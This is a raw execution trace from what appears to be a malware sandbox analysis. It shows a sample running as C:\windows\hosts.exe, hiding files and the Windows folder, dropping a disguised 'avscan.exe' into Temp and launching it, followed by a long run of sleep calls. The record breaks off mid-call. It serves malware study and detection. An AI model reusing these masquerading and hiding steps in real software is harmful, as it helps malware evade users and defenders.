0x14 [0190.228] lstrcpynA (in: lpString1=0x28f3b8, lpString2="C:\\windows\\hosts.exe", iMaxLength=260 | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0190.228] lstrlenA (lpString="C:\\windows\\hosts.exe") returned 20 [0190.228] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b58 [0190.228] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b78 [0190.228] lstrcpyA (in: lpString1=0xe62b58, lpString2="C:\\windows\\hosts.exe" | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0190.230] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xb) returned 0xe61d20 [0190.230] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b78 | out: hHeap=0xe50000) returned 1 [0190.230] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b58 | out: hHeap=0xe50000) returned 1 [0190.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\windows", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0190.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\windows", cbMultiByte=-1, lpWideCharStr=0x10f7cf4, cchWideChar=11 | out: lpWideCharStr="C:\\windows") returned 11 [0190.230] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe61d20 | out: hHeap=0xe50000) returned 1 [0190.230] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f4cc, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0190.230] lstrcpynA (in: lpString1=0x28f3b8, lpString2="C:\\windows\\hosts.exe", iMaxLength=260 | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0190.230] lstrlenA (lpString="C:\\windows\\hosts.exe") returned 20 [0190.230] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b58 [0190.231] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b78 [0190.231] lstrcpyA (in: lpString1=0xe62b58, lpString2="C:\\windows\\hosts.exe" | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0190.232] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x6) returned 0xe6bcd0 [0190.232] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b78 | out: hHeap=0xe50000) returned 1 [0190.232] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b58 | out: hHeap=0xe50000) returned 1 [0190.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="hosts", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0190.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="hosts", cbMultiByte=-1, lpWideCharStr=0x10eea2c, cchWideChar=6 | out: lpWideCharStr="hosts") returned 6 [0190.233] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe6bcd0 | out: hHeap=0xe50000) returned 1 [0190.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\windows\\hosts.exe", cchWideChar=-1, lpMultiByteStr=0x28f410, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\windows\\hosts.exe", lpUsedDefaultChar=0x0) returned 21 [0190.233] GetFullPathNameA (in: lpFileName="C:\\windows\\hosts.exe", nBufferLength=0x104, lpBuffer=0x28f540, lpFilePart=0x28f408 | out: lpBuffer="C:\\windows\\hosts.exe", lpFilePart=0x28f408*="hosts.exe") returned 0x14 [0190.234] CreateFileA (lpFileName="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f500, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0190.234] GetFileType (hFile=0x15c) returned 0x1 [0190.234] IMalloc:Alloc (This=0x76da66bc, cb=0x51) returned 0x11029b8 [0190.235] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.235] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1442557 [0190.236] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.451] IMalloc:Alloc (This=0x76da66bc, cb=0x2884a9a) returned 0x6480020 [0192.456] ReadFile (in: hFile=0x15c, lpBuffer=0x6480020, nNumberOfBytesToRead=0x144254d, lpNumberOfBytesRead=0x28f5a0, lpOverlapped=0x0 | out: lpBuffer=0x6480020*, lpNumberOfBytesRead=0x28f5a0*=0x144254d, lpOverlapped=0x0) returned 1 [0195.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MZ\x90", cbMultiByte=21243213, lpWideCharStr=0x3bf0024, cchWideChar=21243213 | out: lpWideCharStr="MZ\x90") returned 21243213 [0195.650] IMalloc:Free (This=0x76da66bc, pv=0x6480020) [0196.369] CloseHandle (hObject=0x15c) returned 1 [0196.370] IMalloc:Free (This=0x76da66bc, pv=0x11029b8) [0196.370] GetLocalTime (in: lpSystemTime=0x28f61c | out: lpSystemTime=0x28f61c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0xbc)) [0196.370] VarDateFromUdate (in: pudateIn=0x28f640, dwFlags=0x0, pdateOut=0x28f61c | out: pdateOut=0x28f61c) returned 0x0 [0196.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\hosts.exe", cchWideChar=-1, lpMultiByteStr=0x28f410, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\hosts.exe", lpUsedDefaultChar=0x0) returned 21 [0196.370] GetFullPathNameA (in: lpFileName="C:\\Windows\\hosts.exe", nBufferLength=0x104, lpBuffer=0x28f540, lpFilePart=0x28f408 | out: lpBuffer="C:\\Windows\\hosts.exe", lpFilePart=0x28f408*="hosts.exe") returned 0x14 [0196.371] CreateFileA (lpFileName="C:\\Windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x28f500, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0196.371] GetLastError () returned 0x20 [0196.371] GetLastError () returned 0x20 [0196.372] SetLastError (dwErrCode=0x20) [0196.372] GetLastError () returned 0x20 [0196.372] SetLastError (dwErrCode=0x20) [0196.372] GetLastError () returned 0x20 [0196.372] SetLastError (dwErrCode=0x20) [0196.372] GetLastError () returned 0x20 [0196.372] SetLastError (dwErrCode=0x20) [0196.372] GetLastError () returned 0x20 [0196.372] SetLastError (dwErrCode=0x20) [0196.372] GetLastError () returned 0x20 [0196.373] SetLastError (dwErrCode=0x20) [0196.373] GetLastError () returned 0x20 [0196.374] SetLastError (dwErrCode=0x20) [0196.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0196.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x10f7cf4, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0196.374] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f4fc) [0196.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0196.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x10f7cf4, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0196.376] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f5d4) [0196.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0196.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x10f7cf4, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0196.377] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f5d4) [0197.624] FileSystemObject:IDispatch:Invoke (in: This=0x3f2c54, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f700*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f948, pExcepInfo=0x28f6e0, puArgErr=0x28f710 | out: pDispParams=0x28f700*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f948*(varType=0x8, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f6e0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f710*=0x20) returned 0x0 [0197.624] VarCat (in: pvarLeft=0x28f948, pvarRight=0x28f9fc, pvarResult=0x28f938 | out: pvarResult=0x28f938) returned 0x0 [0197.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchWideChar=-1, lpMultiByteStr=0x28f500, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpUsedDefaultChar=0x0) returned 48 [0197.625] GetFullPathNameA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f634, lpFilePart=0x28f4f8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f4f8*="avscan.exe") returned 0x2f [0197.625] SetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", dwFileAttributes=0x6) returned 1 [0197.626] FileSystemObject:IDispatch:Invoke (in: This=0x3f2d04, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f700*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f948, pExcepInfo=0x28f6e0, puArgErr=0x28f710 | out: pDispParams=0x28f700*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f948*(varType=0x8, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1="C:\\Windows" (normalized: "c:\\windows"), varVal2=0x0), pExcepInfo=0x28f6e0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f710*=0x70) returned 0x0 [0197.626] VarCat (in: pvarLeft=0x28f948, pvarRight=0x28f9dc, pvarResult=0x28f938 | out: pvarResult=0x28f938) returned 0x0 [0197.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x28f500, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows", lpUsedDefaultChar=0x0) returned 11 [0197.626] GetFullPathNameA (in: lpFileName="C:\\Windows", nBufferLength=0x104, lpBuffer=0x28f634, lpFilePart=0x28f4f8 | out: lpBuffer="C:\\Windows", lpFilePart=0x28f4f8*="Windows") returned 0xa [0197.627] SetFileAttributesA (lpFileName="C:\\Windows", dwFileAttributes=0x6) returned 1 [0197.627] FileSystemObject:IDispatch:Invoke (in: This=0x3f2c54, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f700*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f948, pExcepInfo=0x28f6e0, puArgErr=0x28f710 | out: pDispParams=0x28f700*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f948*(varType=0x8, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f6e0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f710*=0x20) returned 0x0 [0197.628] VarCat (in: pvarLeft=0x28f948, pvarRight=0x28f9fc, pvarResult=0x28f938 | out: pvarResult=0x28f938) returned 0x0 [0197.628] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x28f6e8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f72c | out: lpCommandLine="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpProcessInformation=0x28f72c*(hProcess=0x160, hThread=0x15c, dwProcessId=0xd54, dwThreadId=0xd58)) returned 1 [0197.712] GetLastError () returned 0x715 [0197.713] WaitForInputIdle (hProcess=0x160, dwMilliseconds=0x2710) Thread: id = 83 os_tid = 0xd3c [0175.459] GetCurrentThreadId () returned 0xd3c [0175.459] GetTickCount () returned 0x1d13be5 [0175.459] Sleep (dwMilliseconds=0x3e8) [0176.594] Sleep (dwMilliseconds=0x3e8) [0177.741] Sleep (dwMilliseconds=0x3e8) [0178.782] Sleep (dwMilliseconds=0x3e8) [0179.868] Sleep (dwMilliseconds=0x3e8) [0180.946] Sleep (dwMilliseconds=0x3e8) [0182.005] Sleep (dwMilliseconds=0x3e8) [0183.146] Sleep (dwMilliseconds=0x3e8) [0184.346] Sleep (dwMilliseconds=0x3e8) [0185.376] Sleep (dwMilliseconds=0x3e8) [0186.434] Sleep (dwMilliseconds=0x3e8) [0187.470] Sleep (dwMilliseconds=0x3e8) [0188.559] Sleep (dwMilliseconds=0x3e8) [0189.620] Sleep (dwMilliseconds=0x3e8) [0190.758] Sleep (dwMilliseconds=0x3e8) [0191.787] Sleep (dwMilliseconds=0x3e8) [0192.819] Sleep (dwMilliseconds=0x3e8) [0193.864] Sleep (dwMilliseconds=0x3e8) [0194.880] Sleep (dwMilliseconds=0x3e8) [0195.930] Sleep (dwMilliseconds=0x3e8) [0196.998] Sleep (dwMilliseconds=0x3e8) [0197.062] Sleep (dwMilliseconds=0x3e8) [0197.203] Sleep (dwMilliseconds=0x3e8) [0197.265] Sleep (dwMilliseconds=0x3e8) [0197.360] Sleep (dwMilliseconds=0x3e8) [0197.451] Sleep (dwMilliseconds=0x3e8) [0197.550] Sleep (dwMilliseconds=0x3e8) [0197.651] Sleep (dwMilliseconds=0x3e8) [0197.717] Sleep (dwMilliseconds=0x3e8) [0197.846] Sleep (dwMilliseconds=0x3e8) [0197.963] Sleep (dwMilliseconds=0x3e8) [0198.054] Sleep (dwMilliseconds=0x3e8) [0198.327] Sleep (dwMilliseconds=0x3e8) [0198.420] Sleep (dwMilliseconds=0x3e8) [0198.469] Sleep (dwMilliseconds=0x3e8) [0198.483] Sleep (dwMilliseconds=0x3e8) [0198.508] Sleep (dwMilliseconds=0x3e8) [0198.514] Sleep (dwMilliseconds=0x3e8) [0198.541] Sleep (dwMilliseconds=0x3e8) [0198.545] Sleep (dwMilliseconds=0x3e8) [0198.592] Sleep (dwMilliseconds=0x3e8) [0198.642] Sleep (dwMilliseconds=0x3e8) [0198.654] Sleep (dwMilliseconds=0x3e8) [0198.658] Sleep (dwMilliseconds=0x3e8) [0198.670] Sleep (dwMilliseconds=0x3e8) [0198.677] Sleep (dwMilliseconds=0x3e8) [0198.680] Sleep (dwMilliseconds=0x3e8) [0198.683] Sleep (dwMilliseconds=0x3e8) [0198.685] Sleep (dwMilliseconds=0x3e8) [0198.687] Sleep (dwMilliseconds=0x3e8) [0198.693] Sleep (dwMilliseconds=0x3e8) [0198.697] Sleep (dwMilliseconds=0x3e8) [0198.700] Sleep (dwMilliseconds=0x3e8) [0198.702] Sleep (dwMilliseconds=0x3e8) [0198.706] Sleep (dwMilliseconds=0x3e8) [0198.708] Sleep (dwMilliseconds=0x3e8) [0198.710] Sleep (dwMilliseconds=0x3e8) [0198.711] Sleep (dwMilliseconds=0x3e8) [0198.713] Sleep (dwMilliseconds=0x3e8) [0198.718] Sleep (dwMilliseconds=0x3e8) [0198.722] Sleep (dwMilliseconds=0x3e8) [0198.729] GetLocalTime (in: lpSystemTime=0x39eff4c | out: lpSystemTime=0x39eff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x230)) [0198.729] Sleep (dwMilliseconds=0x3e8) [0198.732] Sleep (dwMilliseconds=0x3e8) [0198.738] Sleep (dwMilliseconds=0x3e8) [0198.740] Sleep (dwMilliseconds=0x3e8) [0198.742] Sleep (dwMilliseconds=0x3e8) [0198.744] Sleep (dwMilliseconds=0x3e8) [0198.747] Sleep (dwMilliseconds=0x3e8) [0198.750] Sleep (dwMilliseconds=0x3e8) [0198.752] Sleep (dwMilliseconds=0x3e8) [0198.761] Sleep (dwMilliseconds=0x3e8) [0198.762] Sleep (dwMilliseconds=0x3e8) [0198.769] Sleep (dwMilliseconds=0x3e8) [0198.771] Sleep (dwMilliseconds=0x3e8) [0198.773] Sleep (dwMilliseconds=0x3e8) [0198.775] Sleep (dwMilliseconds=0x3e8) [0198.777] Sleep (dwMilliseconds=0x3e8) [0198.779] Sleep (dwMilliseconds=0x3e8) [0198.780] Sleep (dwMilliseconds=0x3e8) [0198.782] Sleep (dwMilliseconds=0x3e8) [0198.789] Sleep (dwMilliseconds=0x3e8) [0198.791] Sleep (dwMilliseconds=0x3e8) [0198.793] Sleep (dwMilliseconds=0x3e8) [0198.801] Sleep (dwMilliseconds=0x3e8) [0198.803] Sleep (dwMilliseconds=0x3e8) [0198.806] Sleep (dwMilliseconds=0x3e8) [0198.808] Sleep (dwMilliseconds=0x3e8) [0198.810] Sleep (dwMilliseconds=0x3e8) [0198.811] Sleep (dwMilliseconds=0x3e8) [0198.813] Sleep (dwMilliseconds=0x3e8) [0198.823] Sleep (dwMilliseconds=0x3e8) [0198.825] Sleep (dwMilliseconds=0x3e8) [0198.830] Sleep (dwMilliseconds=0x3e8) [0198.833] Sleep (dwMilliseconds=0x3e8) [0198.835] Sleep (dwMilliseconds=0x3e8) [0198.838] Sleep (dwMilliseconds=0x3e8) [0198.842] Sleep (dwMilliseconds=0x3e8) [0198.844] Sleep (dwMilliseconds=0x3e8) [0198.849] Sleep (dwMilliseconds=0x3e8) [0198.851] Sleep (dwMilliseconds=0x3e8) [0198.859] Sleep (dwMilliseconds=0x3e8) [0198.861] Sleep (dwMilliseconds=0x3e8) [0198.865] Sleep (dwMilliseconds=0x3e8) [0198.872] Sleep (dwMilliseconds=0x3e8) [0198.874] Sleep (dwMilliseconds=0x3e8) [0198.875] Sleep (dwMilliseconds=0x3e8) [0198.877] Sleep (dwMilliseconds=0x3e8) [0198.882] Sleep (dwMilliseconds=0x3e8) [0198.884] Sleep (dwMilliseconds=0x3e8) [0198.887] Sleep (dwMilliseconds=0x3e8) [0198.891] Sleep (dwMilliseconds=0x3e8) [0198.893] Sleep (dwMilliseconds=0x3e8) [0198.895] Sleep (dwMilliseconds=0x3e8) [0198.904] Sleep (dwMilliseconds=0x3e8) [0198.906] Sleep (dwMilliseconds=0x3e8) [0198.911] Sleep (dwMilliseconds=0x3e8) [0198.913] Sleep (dwMilliseconds=0x3e8) [0198.915] Sleep (dwMilliseconds=0x3e8) [0198.919] Sleep (dwMilliseconds=0x3e8) [0198.920] Sleep (dwMilliseconds=0x3e8) [0198.924] Sleep (dwMilliseconds=0x3e8) [0198.929] GetLocalTime (in: lpSystemTime=0x39eff4c | out: lpSystemTime=0x39eff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2f9)) [0198.930] Sleep (dwMilliseconds=0x3e8) [0198.931] Sleep (dwMilliseconds=0x3e8) [0198.935] Sleep (dwMilliseconds=0x3e8) [0198.941] Sleep (dwMilliseconds=0x3e8) [0198.943] Sleep (dwMilliseconds=0x3e8) [0198.945] Sleep (dwMilliseconds=0x3e8) [0198.947] Sleep (dwMilliseconds=0x3e8) [0198.952] Sleep (dwMilliseconds=0x3e8) [0198.955] Sleep (dwMilliseconds=0x3e8) [0198.960] Sleep (dwMilliseconds=0x3e8) [0198.962] Sleep (dwMilliseconds=0x3e8) [0198.963] Sleep (dwMilliseconds=0x3e8) [0198.972] Sleep (dwMilliseconds=0x3e8) [0198.974] Sleep (dwMilliseconds=0x3e8) [0198.977] Sleep (dwMilliseconds=0x3e8) [0198.982] Sleep (dwMilliseconds=0x3e8) [0198.984] Sleep (dwMilliseconds=0x3e8) [0198.986] Sleep (dwMilliseconds=0x3e8) [0198.990] Sleep (dwMilliseconds=0x3e8) [0198.992] Sleep (dwMilliseconds=0x3e8) [0198.995] Sleep (dwMilliseconds=0x3e8) [0198.997] Sleep (dwMilliseconds=0x3e8) [0199.004] Sleep (dwMilliseconds=0x3e8) [0199.006] Sleep (dwMilliseconds=0x3e8) [0199.009] Sleep (dwMilliseconds=0x3e8) [0199.013] Sleep (dwMilliseconds=0x3e8) [0199.015] Sleep (dwMilliseconds=0x3e8) [0199.017] Sleep (dwMilliseconds=0x3e8) [0199.022] Sleep (dwMilliseconds=0x3e8) [0199.024] Sleep (dwMilliseconds=0x3e8) [0199.028] Sleep (dwMilliseconds=0x3e8) [0199.031] Sleep (dwMilliseconds=0x3e8) [0199.034] Sleep (dwMilliseconds=0x3e8) [0199.036] Sleep (dwMilliseconds=0x3e8) [0199.038] Sleep (dwMilliseconds=0x3e8) [0199.043] Sleep (dwMilliseconds=0x3e8) [0199.046] Sleep (dwMilliseconds=0x3e8) [0199.052] Sleep (dwMilliseconds=0x3e8) [0199.054] Sleep (dwMilliseconds=0x3e8) [0199.057] Sleep (dwMilliseconds=0x3e8) [0199.064] Sleep (dwMilliseconds=0x3e8) [0199.066] Sleep (dwMilliseconds=0x3e8) [0199.071] Sleep (dwMilliseconds=0x3e8) [0199.163] Sleep (dwMilliseconds=0x3e8) [0199.214] Sleep (dwMilliseconds=0x3e8) [0199.269] Sleep (dwMilliseconds=0x3e8) [0199.271] Sleep (dwMilliseconds=0x3e8) [0199.274] Sleep (dwMilliseconds=0x3e8) [0199.276] Sleep (dwMilliseconds=0x3e8) [0199.278] Sleep (dwMilliseconds=0x3e8) [0199.285] Sleep (dwMilliseconds=0x3e8) [0199.286] Sleep (dwMilliseconds=0x3e8) [0199.290] Sleep (dwMilliseconds=0x3e8) [0199.294] Sleep (dwMilliseconds=0x3e8) [0199.296] Sleep (dwMilliseconds=0x3e8) [0199.298] Sleep (dwMilliseconds=0x3e8) [0199.299] Sleep (dwMilliseconds=0x3e8) [0199.301] Sleep (dwMilliseconds=0x3e8) [0199.303] Sleep (dwMilliseconds=0x3e8) [0199.305] Sleep (dwMilliseconds=0x3e8) [0199.307] GetLocalTime (in: lpSystemTime=0x39eff4c | out: lpSystemTime=0x39eff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x82)) [0199.308] Sleep (dwMilliseconds=0x3e8) [0199.310] Sleep (dwMilliseconds=0x3e8) [0199.316] Sleep (dwMilliseconds=0x3e8) [0199.318] Sleep (dwMilliseconds=0x3e8) [0199.320] Sleep (dwMilliseconds=0x3e8) [0199.323] Sleep (dwMilliseconds=0x3e8) [0199.326] Sleep (dwMilliseconds=0x3e8) [0199.328] Sleep (dwMilliseconds=0x3e8) [0199.330] Sleep (dwMilliseconds=0x3e8) [0199.331] Sleep (dwMilliseconds=0x3e8) [0199.335] Sleep (dwMilliseconds=0x3e8) [0199.338] Sleep (dwMilliseconds=0x3e8) [0199.343] Sleep (dwMilliseconds=0x3e8) [0199.481] Sleep (dwMilliseconds=0x3e8) [0199.533] Sleep (dwMilliseconds=0x3e8) [0199.539] Sleep (dwMilliseconds=0x3e8) [0199.541] Sleep (dwMilliseconds=0x3e8) [0199.543] Sleep (dwMilliseconds=0x3e8) [0199.544] Sleep (dwMilliseconds=0x3e8) [0199.546] Sleep (dwMilliseconds=0x3e8) [0199.548] Sleep (dwMilliseconds=0x3e8) [0199.552] Sleep (dwMilliseconds=0x3e8) [0199.555] Sleep (dwMilliseconds=0x3e8) [0199.560] Sleep (dwMilliseconds=0x3e8) [0199.562] Sleep (dwMilliseconds=0x3e8) [0199.564] Sleep (dwMilliseconds=0x3e8) [0199.569] Sleep (dwMilliseconds=0x3e8) [0199.572] Sleep (dwMilliseconds=0x3e8) [0199.574] Sleep (dwMilliseconds=0x3e8) [0199.575] Sleep (dwMilliseconds=0x3e8) [0199.578] Sleep (dwMilliseconds=0x3e8) [0199.582] Sleep (dwMilliseconds=0x3e8) [0199.586] Sleep (dwMilliseconds=0x3e8) [0199.591] Sleep (dwMilliseconds=0x3e8) [0199.593] Sleep (dwMilliseconds=0x3e8) [0199.594] Sleep (dwMilliseconds=0x3e8) [0199.596] Sleep (dwMilliseconds=0x3e8) [0199.601] Sleep (dwMilliseconds=0x3e8) [0199.602] Sleep (dwMilliseconds=0x3e8) [0199.604] Sleep (dwMilliseconds=0x3e8) [0199.605] Sleep (dwMilliseconds=0x3e8) [0199.609] Sleep (dwMilliseconds=0x3e8) [0199.615] Sleep (dwMilliseconds=0x3e8) [0199.618] Sleep (dwMilliseconds=0x3e8) [0199.620] Sleep (dwMilliseconds=0x3e8) [0199.622] Sleep (dwMilliseconds=0x3e8) [0199.623] Sleep (dwMilliseconds=0x3e8) [0199.625] Sleep (dwMilliseconds=0x3e8) [0199.626] Sleep (dwMilliseconds=0x3e8) [0199.671] Sleep (dwMilliseconds=0x3e8) [0199.673] Sleep (dwMilliseconds=0x3e8) [0199.676] Sleep (dwMilliseconds=0x3e8) [0199.684] Sleep (dwMilliseconds=0x3e8) [0199.686] Sleep (dwMilliseconds=0x3e8) [0199.687] Sleep (dwMilliseconds=0x3e8) [0199.692] Sleep (dwMilliseconds=0x3e8) [0199.728] Sleep (dwMilliseconds=0x3e8) [0199.746] Sleep (dwMilliseconds=0x3e8) [0199.751] Sleep (dwMilliseconds=0x3e8) [0199.768] Sleep (dwMilliseconds=0x3e8) [0199.772] GetLocalTime (in: lpSystemTime=0x39eff4c | out: lpSystemTime=0x39eff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, 